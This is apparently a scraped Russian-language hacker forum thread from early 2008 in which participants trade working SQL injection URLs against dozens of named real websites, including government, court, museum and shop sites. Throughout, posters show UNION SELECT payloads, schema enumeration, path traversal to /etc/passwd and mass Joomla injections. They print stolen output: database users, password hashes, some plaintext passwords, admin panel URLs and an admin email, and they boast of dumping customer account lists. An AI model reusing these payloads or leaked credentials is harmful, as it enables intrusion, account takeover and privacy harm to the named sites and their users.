ttp://www.algemeiner.com/generic.asp?cat='
ttp://www.winstep.net/default.asp?cat='
ttp://www.hamil.co.il/media.asp?cat='
ttp://www.felinefido.com/store/WsDefault.asp?Cat='
ttp://www.britishbookshop.at/shop/prod_list.asp?cat='
ttp://www.newsreel.org/nav/topics.asp?cat='
ttp://www.fao.org/biotech/news_list.asp?Cat='
ttp://www.liberation.press.ma/default.asp?cat='
ttp://www.stateofthenewsmedia.com/2007/narrative_digital_profile.asp?cat='
ttp://www.airfagev.com/downloads.asp?cat='

razzzar

29.01.2008, 19:00

http://www.digitalidworld.com/modules.php?op=modload&name=News&file=article&sid=-1+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23/*&mode=chrono&order=0

nuke@localhost:4.0.16-log:didw

Mobile

29.01.2008, 19:16

чёт надоело уже видеть, как тут версии бд, и имена юзеров выкладывают...
http://thebasketgarden.net/catalog/links.php?link_id=-99999+union+select+1,2,3,cos(pi()/10),5,6,7,8,9/*
http://thebasketgarden.net/catalog/links.php?link_id=-99999+union+select+1,2,3,ATAN2(pi(),4),5,6,7,8,9/*

Tyc00n

29.01.2008, 19:40

http://www.jobs-market.ru

http://www.jobs-market.ru/resume.php?id=999+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16

version() - 5.0.51
database() - jobsmarket_job
user() - jobsmarket_job@localhost

17:adminip
17:--1:pass
18:bunsip
18:--1:bunsip
18:--2:why
18:--3:date
18:--4:period
19:category
19:--1:razdel
19:--2:podrazdel
26:resorderlist
26:--1:user
26:--2:unit
26:--3:number
26:--4:date
26:--5:status
27:resume
27:--14:family
27:--15:edu
32:--7:fio
32:--8:firm
32:--9:birth
32:--10:gender
32:--11:civil
32:--12:family
33:--7:zp
33:--8:gender
33:--9:grafic
33:--10:zanatost
33:--11:stage
33:--12:treb
33:--24:pay

Оставил самое интересное :)
Можно снять базу мыл с фио и адресами :)

159932

29.01.2008, 21:59

www.neo-lit.ru
http://neo-lit.ru/forprint.php?id=-2452+union+select+1,2,3,concat_ws(0x3a,name,pass), 5,6,7,8+from+neo_auth+limit+49,1/*
http://neo-lit.ru/forprint.php?id=-2452+union+select+1,2,3,concat_ws(0x3a,login,passw ord),5,6,7,8+from+u41707_other.myusers+limit+3,1/*
5.0.45-log
админка - http://neo-lit.ru/stat/ - но пасс не подошёл ..
есть табла respondents в ней (name и md5) но с префиксом и без него не могу попасть ..
http://neo-lit.ru/robots.txt

n0ne

29.01.2008, 22:51

Tyc00n, ты забыл про таблицу admins с полями pass и name :) админка - /admin

n0ne

30.01.2008, 02:25

Tyc00n, руки все равно будут всегда лучше и надежнее :) Словари обнови, добавь стандартные таблицы и поля двигов распостраненных, сам допиши, посмотри по форуму и не будет пропускать)

30.01.2008, 11:59

sql inj
http://teh-nn.ru/news.php?id=-3+union+select+1,2,3,4,concat_ws(0x3a,login,passwo rd),6+from+users
http://www.loran-eko.ru/news.php?id=-3+UNION+SELECT+1,concat(login,0x3a,pass),3,4,5+fro m+users
http://www.dhmr.ru/news.php?id=-3+union+select+1,2,3,4,version(),6+users
php inc
http://www.wearetheclips.com/main.php?p=../../../../../etc/passwd
http://www.prescription.fr/index.php?p=../../../../etc/passwd

n0ne

30.01.2008, 12:31

b3, что-то мне подсказывает, что для пхп-инжей тут есть отдельная тема)

bobob

30.01.2008, 15:20

http://www.allaboutjazz.com/php/news.php?id=-13551+union+select+1,2,concat(version(),0x3a,user( ),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33,34,35,36,37,38,39,40,41,42/*

4.1.20:vxweb@jazzy:allaboutjazz

:mad: а таблички не подобрал, есть мемберка

порыскайте кому не лень

bobob

30.01.2008, 16:18

:) саксесс

http://e*s*h*o*p.w*h*t*t.org/e*s*h*o*p.php?id=-24+union+select+1,concat(email,0x3a,password),3,4, 5,6,7,8,9,10+from+members/*
http://e*s*h*o*p.w*h*t*t.org/order.php

:cool:
пхпмайадмин имеет стандартный урл, но пас и логин я не нашел ((( и админку не нашел, если кто узнает скрипт - ставьте на локалку, там и таблички с колонками найдете и пути, и всё ваше будет. Так как я таблички и колонки на угад писал :o

уберите звёздочки и не цитируйте плз урл, так как потом удалю может

159932

30.01.2008, 22:58

звиняйте за оффтоп - bobob зачем звёзды в урле ?

bobob

30.01.2008, 23:17

ну шоп, чтоб потом сюда не пришли по гуглу

.Begemot.

30.01.2008, 23:34

oferta9.ro
http://www.oferta9.ro/magazin.php?m=-661+union+select+0,1,2,3,4,concat(USER(),0x3a,VERS ION(),0x3a,DATABASE()),6,7,8,9/*
USER:mn76_iuser@localhost
VERSION:4.1.22-standard
DATABASE:mn76_piata9
disenoemergente.cl
http://www.disenoemergente.cl/index_noticia.php?noticia=-177+union+select+0,1,2,concat(USER(),0x3a,VERSION( ),0x3a,DATABASE()),4,5,6,7,8,9,10/*
USER:diseno@localhost
VERSION:5.0.32-Debian_7etch4-log
DATABaSE:diseno
guatemala.gob.gt
http://www.guatemala.gob.gt/noticias.php?mes=1&anyo=2006&dia=14&tipo=1+union+select+0,1,convert(concat(USER(),0x3a ,VERSION(),0x3a,DATABASE())+using+latin1),3,4,5,6, 7,8,9,10,11,12/*
USER:root@localhost
VERSION:4.1.7
DATABASE:presidencia

~EviL~

30.01.2008, 23:43

http://rs.karacitours-bg.info/

http://rs.karacitours-bg.info/cms_show_hotel.php?id=4274+UNION+SELECT+1,2,3,4,5, 6,7,concat_ws(0x3a,version(),user(),database())/*
5.0.32-Debian_7etch1-log:root@localhost:cs

http://rs.karacitours-bg.info/cms_show_hotel.php?id=4274+UNION+SELECT+1,2,3,4,5, 6,7,concat_ws(0x3a,id,username,pwd)+FROM+alfauser+ LIMIT+1,1/*
1:karaci:karaci123
2:rual:rual123
3:desi_karaci:desi001
...

http://rs.karacitours-bg.info/cms_show_hotel.php?id=4274+UNION+SELECT+1,2,3,4,5, 6,7,concat_ws(0x3a,user,password)+FROM+mysql.user/*
debian-sys-maint:*D9B5ECA68500BC0D046CB07B2CC6F224E4470FE3

Sharingan

31.01.2008, 13:58

Австралийский сайтец
http://www.mgnsw.org.au/museums_and_galleries.php?id=-1+union+select+1,concat(version(),0x3a,user(),0x3a ,database()),3,4,5,6/*
4.1.20:mgnsw@localhost:mgnsw

MaSter GeN

31.01.2008, 15:10

Вот такой интересный скуль

http://www.ipecac.com/bio.php?id=44'

подобрал количество столбцов через order by т.е
вот такой код вызывает ошибку

http://www.ipecac.com/bio.php?id=44+order+by+5/*

вот такой нет

http://www.ipecac.com/bio.php?id=44+order+by+4*

следовательно должно рабоать
http://http://www.ipecac.com/bio.php?id=44/**/union/**/select/**/1,2,3,4/*
но почему то кричит:You don't have permission to access /bio.php on this server.
в чем проблема ? :)

bobob

31.01.2008, 15:17

4 штуки, но не пускает действительно, шяс еще порыскаю
может у них там просто траблы с самим скриптом и мы не виноваты

апд - не асили, а шоп у них всёравно на другом домене под aspx :mad:

MaSter GeN

31.01.2008, 15:31

что за нах там ещё xss пассив есть news_search.php
так с ней та же самая прабла орет :
You don't have permission to access /news_search.php on this server.
что за зашита такая O_o подскажите !

vp$

31.01.2008, 16:27

http://www.stylepark.ru/site.php?pid=4000000+UNION+SELECT+1,concat_ws(0x3a ,login,password)+from+u58209_glg.dealers/*
dealer:051db1672e6974a5
17:cb_brends
17:--1:mid
17:--2:title
17:--3:logo
17:--4:descr
18:cb_catalog
18:--1:mid
18:--2:title
18:--3:articul
18:--4:color
18:--5:sizes
18:--6:contain
18:--7:package
18:--8:description
18:--9:foto_small
18:--10:foto_big
18:--11:brend
18:--12:newprod
19:cb_config
19:--1:email
19:--2:phone
19:--3:news_on_main
20:cb_gallery_albums
20:--1:parent
20:--2:name
20:--3:description
21:cb_gallery_images
21:--1:aid
21:--2:file
21:--3:name
21:--4:description
21:--5:alt
21:--6:sort
21:--7:cover
22:cb_menu
22:--1:pid
22:--2:title
22:--3:body
22:--4:modul
22:--5:ord
22:--6:_left
22:--7:_right
22:--8:_level
22:--9:protect
23:cb_menu_seq
24:cb_news
24:--1:mid
24:--2:title
24:--3:anons
24:--4:body
24:--5:date
25:about
25:--1:img1
25:--2:img2
25:--3:img3
25:--4:img4
25:--5:img5
25:--6:text
26:about_main
26:--1:img1
26:--2:img2
26:--3:img3
26:--4:img4
26:--5:img5
27:adv
27:--1:razdel_num
27:--2:head
27:--3:link_excel
27:--4:excel
27:--5:link_html
27:--6:html
27:--7:text
28:anons
28:--1:head
28:--2:img
28:--3:type
28:--4:text
28:--5:when
28:--6:visibility
29:asociate
29:--1:asociate_teacher
29:--2:asociate_to
29:--3:asociate_type
30:auth
30:--1:password
31:cons
31:--1:name
31:--2:email
31:--3:city
31:--4:message
31:--5:answer
31:--6:time
32:dealers
32:--1:login
32:--2:password
33:dealers_files
33:--1:name
33:--2:file
33:--3:text
34:fakultet
34:--1:fakultet_name
34:--2:fakultet_type
35:groupe
35:--1:groupe_name
35:--2:groupe_id_kaf

gibson

31.01.2008, 17:28

свежая уязвимость и ...
thefedonline.com
admin|91b41df29d41d9222c99702c718c27c1

metroriderla.com
admin|5cf5e1e79cc08b7b27e2dfeb6ee136a7

miaztlan.com
djsonic|85493514b935d53994045bdb044a4ab5

двойной md5 хэш пароль
wordpressuser_xxx=логин;wordpresspass_xxx=д� �ойной_md5_хэш_пароля
где xxx - md5 хэш урла блога без обратного слэша, например: md5("xttp//site.com/wordpress")

.Begemot.

31.01.2008, 17:30

например
-17'+order+by+1/* и
-17'+order+by+100000/*
никаких отличий не дали (((
как опеределили или это просто подбор унионом???
Нужно чтобы -17' - было существующий значение. 17+order+by+1/*
Подробнее https://forum.antichat.ru/showpost.php?p=373193&postcount=17
Вообщето есть специальная тема для таких вопросов - http://forum.antichat.ru/threadedpost579824.html#post579824

159932

31.01.2008, 17:54

для bobob
возми для примера -
http://www.roskrup.ru/grain.html?goods=35'+order+by+1/*
http://www.roskrup.ru/grain.html?goods=35'+order+by+50/*

bobob

31.01.2008, 18:03

.Begemot., 159932, терь понял, сравнивать надо было существующие, меня глючит иногда! СПАСИБО!!!

ElteRUS

31.01.2008, 20:02

http://www.mediakuzbass.ru/news/index.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6/*

4.1.22/media/trakt@localhost
-----------------------------------------------------------------------------

http://www.mobd.ru/index.php?id=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4/*

4.0.25-log/wwwmobdru_mobdru_osc1/mobd@tux.hc.ru
-----------------------------------------------------------------------------
fisinter.ru

http://fisinter.ru/nametip20060207/nametip.htm?lang=de&name=335&tip=-1)+union+select+1,concat_ws(0x2F,version(),databas e(),user()),3/*

5.0.15-standard-log/KmUtfDe/db@localhost

http://fisinter.ru/nametip20060207/nametip.htm?lang=de&name=335&tip=-1)+union+select+1,concat_ws(0x2F,user,Password),3+ from+mysql.user/*

юзер/хеш
root/39d3d1360b2b23b0
--------------------------------------------------------------------------
novoport.ru

http://www.novoport.ru/news.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6/*

4.0.24_Debian-10sarge2/nvp/root@localhost

http://www.novoport.ru/news.php?id=-1+union+select+1,2,concat_ws(0x2F,username,user_pa ssword,user_email),4,5,6+from+phpbb_users/*

логин/хеш/мейл
Admin/d4825e84f0ce065b97c2c0772f769f1a/admin2@novoport.ru

.Begemot.

31.01.2008, 20:09

rentacarmm.com
http://www.rentacarmm.com/?op=page&lan=BG+union+select+0,concat(user(),0x3a,version() ,0x3a,database()),2/*&id=65
USER:car@localhost
VERSION:5.0.45-Debian_1-log
DATABASE:car
http://www.rentacarmm.com/?op=page&lan=BG+union+select+0,table_name,2+from+informatio n_schema.tables/*&id=65
http://www.rentacarmm.com/?op=page&lan=BG+union+select+0,column_name,2+from+informati on_schema.columns/*&id=65
-----------------------------------------------
tercersector.net
http://www.tercersector.net/php/general.php?seccio=sc_pubs&tipus=1+union+select+concat(USER(),0x3a,VERSION(), 0x3a,DATABASE())/*&idioma=Cs
USER:delsur@pau.pangea.org
VERSION:4.0.24_Debian-10sarge3-log
DATABASE:otsweb
-----------------------------------------------
tecnocasa.hu
http://www.tecnocasa.hu/cgi-bin/uj/fo.php?t=iroda&ID=-1+union+select+0,1,concat(USER(),0x3a,VERSION(),0x 3a,DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17/*&PHPSESSID=29b0ba2892876c303128bb0626336391
USER:rkcsaGfm7@hm0
VERSION:5.0.32-Debian_7etch4-log
DATABASE:tecnocasa_hu
http://www.tecnocasa.hu/cgi-bin/uj/fo.php?t=iroda&ID=-1+union+select+0,1,table_name,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17+from+information_schema.tables/*&PHPSESSID=29b0ba2892876c303128bb0626336391
http://www.tecnocasa.hu/cgi-bin/uj/fo.php?t=iroda&ID=-1+union+select+0,1,column_name,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17+from+information_schema.columns/*&PHPSESSID=29b0ba2892876c303128bb0626336391
http://www.tecnocasa.hu/cgi-bin/uj/fo.php?t=iroda&ID=-1+union+select+0,1,column_name,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17+from+information_schema.columns +where+table_name='district'+limit+1,10/*&PHPSESSID=29b0ba2892876c303128bb0626336391 - вывод всех названий колонок таблици district

~EviL~

31.01.2008, 21:02

http://tests.vratza.com/

http://tests.vratza.com/material.php?id=11+UNION+SELECT+1,2,null,CONVERT(c oncat_ws(0x3a,version(),user(),database())+USING+L ATIN1),5,6,7,8,9,10/*
5.0.18-Max:vratza@localhost:vratza_com_-_vratza

http://tests.vratza.com/material.php?id=11+UNION+SELECT+1,2,null,CONVERT(t able_name+USING+LATIN1),5,6,7,8,9,10+FROM+informat ion_schema.tables/*
...
bulgariahouse_users
bulgariatour_users
dhc_users
inv_users
limestone_users
otc_users
phpads_clients
ptg_users
rcz_users
vik_users
visit_users
vratzata_users
...

http://tests.vratza.com/material.php?id=11+UNION+SELECT+1,2,null,CONVERT(c oncat_ws(0x3a,user,pass)+USING+LATIN1),5,6,7,8,9,1 0+FROM+users/*

admin:1a443982b6068cd6f44624f324f4bd1e::bil274
hotfm:9bb312efb1c1d4e51e4c696b7626f00b

<Trash_man>

31.01.2008, 21:19

http://edu.kzn.ru/russian/news/education_rf/id=-1+union+select+1,2,version(),4,5,database(),7,8,9, 10,11,12,user(),14,15,16,17,18,19,20,21/*
версия 4.0.21
database tatedu
user tatedu@localhost

razzzar

31.01.2008, 22:00

http://www.soaw.org/newswire_detail.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version (),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21/*
soawatch@205.178.145.65:4.1.21:soaworg

http://dscripts.awardspace.com/scripts.php?id=-1+union+select+1,2,3,4,5,6,cast(concat_ws(0x3a,use r(),version(),database())+as+binary),8,9,10,11,12, 13/*&action=guide
dburhan_db@82.197.131.19:4.1.18-log:dburhan_db

159932

31.01.2008, 22:38

http://www.comingsoon.net/news/movienews.php?id=-37591+union+select+1/*
4.1.22
pr6
-----------------------------------------------------
http://www.roguegovernment.com/news.php?id=-4682+union+select+convert(concat(user,0x3a,passwor d,0x3a,host),binary),2,3,4,5,6+from+mysql.user/*
4.1.7
root:6aee13f5467031e6:localhost ((
-----------------------------------------------------
www.bulgariatour.org
5.0.18-Max
http://www.bulgariatour.org/index.php?site=whatnew&stl=11+union+select+1,2,3,convert(concat_ws(0x3a,a dmin,admin_pwl),binary),5,6,7,8+from+phpads_config/*&title=%CD%EE%E2%EE%F2%EE+%E2+%F1%E0%E9%F2%E0&lang=bu
admin:*588D8374F5C7ED3D9D9E25022C999F40A371CB5B:bi l274
http://www.bulgariatour.org/index.php?site=whatnew&stl=11+union+select+1,2,3,convert(concat_ws(0x3a,u ser,pass),binary),5,6,7,8+from+users/*&title=%CD%EE%E2%EE%F2%EE+%E2+%F1%E0%E9%F2%E0&lang=bu
admin:1a443982b6068cd6f44624f324f4bd1e:bil274
hotfm:9bb312efb1c1d4e51e4c696b7626f00b

~EviL~

31.01.2008, 23:29

http://www.buildingoftheyear.bg/

http://www.buildingoftheyear.bg/vote.php?id=-273+UNION+SELECT+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8/*
5.0.32-Debian_7etch5-log:boty_user@localhost:boty

http://bg-interface.net/

http://bg-interface.net/view.php?id=-112+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(), user(),database()),6,7,8,9,10,11,12,13,14,15,16/*
4.1.22:kitchenb_kitchen@localhost:kitchenb_bgintef ace

http://www.bar.bg/

http://www.bar.bg/designs/inox2_bg.php?id=292+UNION+SELECT+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,concat_ws(0x3a,version(),user(),database()),28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 ,63,64,65,66,67,68/*
5.0.45-community:barbg_site@localhost:barbg_bar

http://nij.court-bg.org/

http://nij.court-bg.org/bg/info.php?id=-10+UNION+SELECT+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6,7,8,9,10,11,12/*
5.0.45-Debian_1:root@localhost:nij

http://sofiacouncil.bg/

http://sofiacouncil.bg/index.php?page=news&id=-75+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,version (),user(),database()),8,9/*
4.0.21-log:sosadm@localhost:sosdb

http://www.cem.bg/

http://www.cem.bg/r.php?sitemap_id=78&id=-2345+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),u ser(),database()),5/*
4.0.24_Debian-10sarge2-log:cemdb@localhost:cem

http://www.savoyrent.com/

http://www.savoyrent.com/r.php?sitemap_id=32&id=-154+UNION+SELECT+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8/*
4.0.24_Debian-10sarge2-log:savoy@localhost:savoy_new

http://www.hillman.bg/

http://www.hillman.bg/show_product.php?id=-57+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,concat_ws(0x3a,version(),us er(),database()),24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42/*&selected_id=57
5.0.33-log:hillman@localhost:hillman

http://mtexbg.com/

http://mtexbg.com/products.php?id=131+and(1=2)+UNION+SELECT+1,concat _ws(0x3a,version(),user(),database()),3,4,5,6,7,8, 9,10,11,12,13/*
4.0.27-standard:mtexbg@localhost:mtexbg_mtex

Isis

01.02.2008, 07:31

http://www.incharacter.org/article.php?article=null/**/UNION/**/SELECT/**/1,2,concat_ws(0x3a,user(),database(),version()),4, 5,6/*

templeton@localhost:incharacter:4.0.21-nt

WuWu

01.02.2008, 15:13

http://www.uprava.org/section.php?id=9999+union+select+1,concat_ws(0x3a, version(),user(),database()),3,4,5,6,7/*

4.0.27
uprava-org@he2.hoster.ru
uprava-org

http://www.i-shop.com.ua/catalog.php?cid=-9999+union+select+1,concat_ws(0x3a,version(),user( ),database()),3,4,5/*

4.0.27-standard-log
i-shop@localhost
I-shop

it's my

01.02.2008, 16:31

http://shop.nourost.ru/index.php?cat=100500%20UNION%20SELECT%20NULL,NULL, CONCAT(USER(),0x3a,VERSION(),0x3a,DATABASE()),NULL ,NULL,NULL--
http://www.mks-ks.ru/shop/cat.php?id=100500+UNION+SELECT+1,2,3,CONCAT(USER() ,0x3a,VERSION(),0x3a,DATABASE())--

it's my

01.02.2008, 18:46

http://www.pilot-film.com/index.php?id=99999999+union+select+0,concat(100500 ),0,0,0,0,0,0,0,0,0/*
http://www.gamesfirst.com/index.php?id=999999+union+select+concat(username,0 x3a,password),concat(user(),0x3a,version(),0x3a,da tabase()),0+from+users/*

<Trash_man>

01.02.2008, 20:03

http://edu.kzn.ru/russian/news/education_rf/id=-1+union+select+1,2,version(),4,5,database(),7,8,9, 10,11,12,user(),14,15,16,17,18,19,20,21/*
версия 4.0.21
database tatedu
user tatedu@localhost

Вчера не было времени таблицы искать....
вот типо продолжение
http://edu.kzn.ru/russian/news/education_rf/id=-1+union+select+1,2,login,4,5,passwd,7,8,9,10,11,12 ,id,14,15,16,17,18,19,20,21+from+user/*
yarr:226d4a1166705006

it's my

02.02.2008, 02:56

http://aquarella.portraits.free.fr/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,pas sword)+from+jos_users/*
http://brodnica.com.pl/powiat/index.php?option=com_akogallery&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password), 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+fr om+mos_users--
http://getawebsite.co.za/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,pas sword)+from+jos_users/*
http://houston.windowssupport.us/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,pas sword)+from+jos_users/*
http://kamilo.net/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,pas sword)+from+jos_users/*
http://netrou.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,pas sword)+from+jos_users/*
http://parkhaus-occamstrasse.de/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,pas sword)+from+jos_users/*
http://pibbca.org.br/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,pas sword)+from+jos_users/*
http://www.adeosys.net/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,pas sword)+from+jos_users/*
http://www.amisaquero.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,pas sword)+from+jos_users/*
http://www.biodigital.pt/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,pas sword)+from+jos_users/*
http://www.bugesco.be/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,pas sword)+from+jos_users/*
http://www.diariometropolitano.com/rmbs/index.php?option=com_nicetalk&tagid=-1)+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,concat(userna me,0x3a,p assword),12,13,14,15,16,17,18+FROM+jos_users--
http://www.dip-gradjenje.hr/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,pas sword)+from+jos_users/*
http://www.espritmx.net/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,pas sword)+from+jos_users/*
http://www.experience-digitale.com/services/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,pas sword)+from+jos_users/*
http://www.fogl.co.yu/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,pas sword)+from+jos_users/*
http://www.genim.fr/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,pas sword)+from+jos_users/*
http://www.happyboots.ch/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,pas sword)+from+jos_users/*
http://www.hatfielddesign.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,pas sword)+from+jos_users/*
http://www.infobit.si/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,pas sword)+from+jos_users/*
http://www.itelcom.de/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,pas sword)+from+jos_users/*
http://www.laniq.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,pas sword)+from+jos_users/*
http://www.mxpro-racing.com/web05/index.php?option=com_catalogshop&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password), 3,4,5,6,7,8,9,10,11,12,13+from+mos_users--
http://www.ninaris.hu/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,pas sword)+from+jos_users/*
http://www.pcl-assistance.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,pas sword)+from+jos_users/*
http://www.povecalo.com/site/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,pas sword)+from+jos_users/*
http://www.ptsims.net/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,pas sword)+from+jos_users/*
http://www.rhinoportail.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,pas sword)+from+jos_users/*
http://www.salatiello.com/index.php?option=com_catalogshop&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password), 3,4,5,6,7,8,9,10,11,12,13+from+mos_users--
http://www.samrotoli.biz/site/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,pas sword)+from+jos_users/*
http://www.sepangaircraft.com/index.php?option=com_neorecruit&task=offer_view&id=369852+UNION+SELECT+1,concat(username,0x3a,pass word),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25+FROM+jos_users--
http://www.sisred.com/Joomla/index.php?option=com_catalogshop&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password), 3,4,5,6,7,8,9,10,11,12,13+from+jos_users--
http://www.siteinternet.re/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,pas sword)+from+jos_users/*
http://www.uralmetall.com/index.php?option=com_catalogshop&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password), 3,4,5,6,7,8,9,10,11,12,13+from+mos_users--
http://www.web-upp.de/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,pas sword)+from+jos_users/*

o3,14um

02.02.2008, 04:17

мускул инж
http://islamlib.com/id/index.php?page=article&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27+from+users/*

Piflit

02.02.2008, 21:31

http://www.i-shop.com.ua/catalog.php?cid=-9999+union+select+1,concat_ws(0x3a,version(),user( ),database()),3,4,5/*

4.0.27-standard-log
i-shop@localhost
I-shop
http://www.i-shop.com.ua/catalog.php?cid=-9999+union+select+1,concat(login,0x3a,pass,0x3a,em ail),3,id,5+from+customers/*
10k акков... надеюсь, никто не пострадает ;)

bobob

02.02.2008, 22:37

http://www.a*i*n*a*u*d*i*o.l*v/index.php?item=92&cat=-18+union+select+concat_ws(0x3a,id,email,pwd,valida tion_key,valid,created,phone,fullname,lastvisit,pa y_vat,type_pers,bill_to,ship_to),2+from+users+limi t+6,1/*

для просмотра меняем лимиты

-MoLoToK-

02.02.2008, 23:30

Искал аккорды на гитару нашёл скулю))
Довольно хитрая фильтрация, без ковычки перед union ничего не пашет
http://tabcrawler.com/search.php?show=artist-list&letter=-1'+union+select+password+from+mysql.user/*
root: 46b0f804077918b1
*d450d21dcc39df8471df867995cec28cb04061bf
Пятая ветка, таблицы выкладываются сразу все списком
http://tabcrawler.com/search.php?show=artist-list&letter=-1'+union+select+Table_name+from+information_schema .tables/*

ElteRUS

02.02.2008, 23:41

http://www.aiim.org/standards.asp?id=-1+or+1=@@version--

Microsoft SQL Server 7.00 - 7.00.961 (Intel X86) Oct 24 2000 18:39:12 Copyright (c) 1988-1998 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)

http://www.aiim.org/standards.asp?id=-1+or+1=(select+system_user)--

aiimwebuser

http://www.aiim.org/standards.asp?id=-1+or+1=(select+db_name())--

CGIWEB
-----------------------------------------------------------------------------
lisenok.ru

http://www.lisenok.ru/look.php?id=-1+union+select+1,2,3,concat_ws(0x2F,version(),data base(),user()),5/*

5.0.45-log/liseno_liseno/liseno_liseno@localhost

http://www.lisenok.ru/look.php?id=-1+union+select+1,2,3,concat_ws(0x2F,login,password ),5+from+users/*

логин/пароль
lis/skyweb
---------------------------------------------------------------------------
allurent.com

http://www.allurent.com/page.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x2F,versio n(),database(),user()),9,10,11,12/*

4.1.20/allurent_prod_12507/allurent@localhost

http://www.allurent.com/page.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x2F,user,P assword),9,10,11,12+from+mysql.user/*

root/

http://www.allurent.com/page.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x2F,name,p assword),9,10,11,12+from+users/*

имя/пароль
allurite/d1fnt. pW*rD

Basurman

03.02.2008, 02:24

http://pechatnick.com

version(): 5.0.45-log
user(): u8421@10.10.223.234 (masterhost; phpmyadmin.masterhost.ru; wmail.masterhost.ru)

http://pechatnick.com/users/index.phtml?uid=-1+union+select+concat_ws(0x3a,user_id,name,login,e mail,skype,pass,icq)+from+users+limit+0,1/*

админка: http://pechatnick.com/_admin/
login: tanya
pass: xxx

Momiji

03.02.2008, 02:44

nmspacemuseum.org

http://www.nmspacemuseum.org/content.php?id=21'%20union+select+1,concat_ws(0x3, version(),user(),database()),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16+limit+1,1+--+
4.1.20nmspacemuseum@localhostnmspacemuseum_live

http://www.nmspacemuseum.org/content.php?id=21'+union+select+1,concat_ws(0x3,us er_name,user_pass,user_email),3,4,5,6,7,8,9,10,11, 12,13,14,15,16+from+users+limit+1,1+--+
adminNMMSH-01doug.patinka@state.nm.us
Админка: http://www.nmspacemuseum.org/admin/index.php

WuWu

03.02.2008, 02:50

